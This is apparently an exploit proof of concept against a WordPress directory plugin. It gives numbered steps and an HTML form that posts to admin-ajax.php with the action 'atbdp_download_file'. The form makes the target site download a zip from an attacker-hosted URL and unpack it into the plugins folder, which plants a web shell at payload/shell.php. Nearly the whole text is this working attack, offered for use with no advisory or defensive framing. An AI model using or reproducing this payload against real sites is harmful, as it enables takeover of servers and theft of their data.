1. Authenticate as any user.
2. Paste below HTML into any page on any site.
3. Replace [target-site] with the target URL.
4. Repalce [site-with-payload-zip] with the URL hosting your zip file and submit the form.
5. Zip file contents will be extracted in plugins folder https://[target-site].com/wp-content/plugins/payload/shell.php

<form action="https://[target-site].com/wp-admin/admin-ajax.php" method="post">
  <input type="text"  name="action" value="atbdp_download_file"><br>
    <input type="text"  name="download_item[download_link]" value='https://[site-with-payload-zip].com/'><br>    
    <input type="text"  name="download_item[skip_licencing]" value='true'><br> 
    <input type="text"  name="download_item[permalink]" value='true'><br>    
    <input type="text"  name="type" value="plugin"><br>
  <input type="submit" value="Submit">